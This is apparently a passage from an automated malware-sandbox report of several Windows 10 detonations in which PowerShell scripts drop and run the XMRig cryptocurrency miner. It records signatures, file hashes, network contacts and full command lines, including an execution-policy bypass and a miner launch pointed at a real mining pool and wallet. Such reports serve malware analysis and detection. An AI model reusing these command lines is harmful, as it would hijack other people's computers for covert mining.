memory/3656-144-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-145-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-146-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-147-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-148-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-149-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-150-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-151-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-152-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-153-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-154-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-155-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
memory/3656-156-0x00007FF73B090000-0x00007FF73BCC3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:39
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3616-4-0x00007FFE06F23000-0x00007FFE06F24000-memory.dmp
memory/3616-5-0x00000270F5390000-0x00000270F53B2000-memory.dmp
memory/3616-8-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/3616-9-0x00000270F5670000-0x00000270F56E6000-memory.dmp
memory/3616-10-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_423dm12o.rcc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3616-25-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/3616-48-0x00000270F57F0000-0x00000270F5802000-memory.dmp
memory/3616-61-0x00000270F5430000-0x00000270F543A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4176-90-0x00000139A3320000-0x00000139A3340000-memory.dmp
memory/4176-91-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-92-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/3616-93-0x00007FFE06F23000-0x00007FFE06F24000-memory.dmp
memory/3616-94-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/4176-95-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-96-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-97-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-98-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-99-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-100-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-101-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-102-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-103-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-104-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-105-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-106-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-107-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-108-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-109-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-110-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-111-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-112-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-113-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-114-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-115-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-116-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-117-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-118-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-119-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-120-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-121-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-122-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-123-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-124-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-125-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-126-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-127-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-128-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-129-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-130-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-131-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-132-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-133-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-134-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-135-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-136-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-137-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-138-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-139-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-140-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-141-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-142-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-143-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-144-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-145-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-146-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-147-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-148-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-149-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-150-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-151-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-152-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-153-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-154-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
memory/4176-155-0x00007FF793FC0000-0x00007FF794BF3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:14
Platform
win10v2004-20240611-en
Max time kernel
1800s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1988 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1988 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
Files
memory/1988-0-0x00007FFB65F33000-0x00007FFB65F35000-memory.dmp
memory/1988-1-0x00007FFB65F30000-0x00007FFB669F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1gm5wa5.uiq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1988-11-0x000001CC999A0000-0x000001CC999C2000-memory.dmp
memory/1988-12-0x00007FFB65F30000-0x00007FFB669F1000-memory.dmp
memory/1988-14-0x00007FFB65F30000-0x00007FFB669F1000-memory.dmp
memory/1988-15-0x000001CCB2C70000-0x000001CCB2C82000-memory.dmp
memory/1988-16-0x000001CCB1EF0000-0x000001CCB1EFA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2640-47-0x0000020AF34A0000-0x0000020AF34C0000-memory.dmp
memory/2640-48-0x0000020AF34F0000-0x0000020AF3510000-memory.dmp
memory/2640-49-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/1988-50-0x00007FFB65F33000-0x00007FFB65F35000-memory.dmp
memory/1988-51-0x00007FFB65F30000-0x00007FFB669F1000-memory.dmp
memory/2640-52-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-53-0x0000020AF3510000-0x0000020AF3530000-memory.dmp
memory/2640-54-0x0000020AF3530000-0x0000020AF3550000-memory.dmp
memory/2640-55-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/1988-56-0x00007FFB65F30000-0x00007FFB669F1000-memory.dmp
memory/2640-57-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-58-0x0000020AF3510000-0x0000020AF3530000-memory.dmp
memory/2640-59-0x0000020AF3530000-0x0000020AF3550000-memory.dmp
memory/2640-60-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-61-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-62-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-63-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-64-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-65-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-66-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-67-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-68-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-69-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-70-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-71-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-72-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-73-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-74-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-75-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-76-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-77-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-78-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-79-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-80-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-81-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-82-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-83-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-84-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-85-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-86-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-87-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-88-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-89-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-90-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-91-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-92-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-93-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-94-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-95-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-96-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-97-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-98-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-99-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-100-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-101-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-102-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-103-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-104-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-105-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-106-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-107-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-108-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-109-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-110-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-111-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-112-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-113-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-114-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-115-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-116-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-117-0x00007FF631C30000-0x00007FF632863000-memory.dmp
memory/2640-118-0x00007FF631C30000-0x00007FF632863000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:15
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
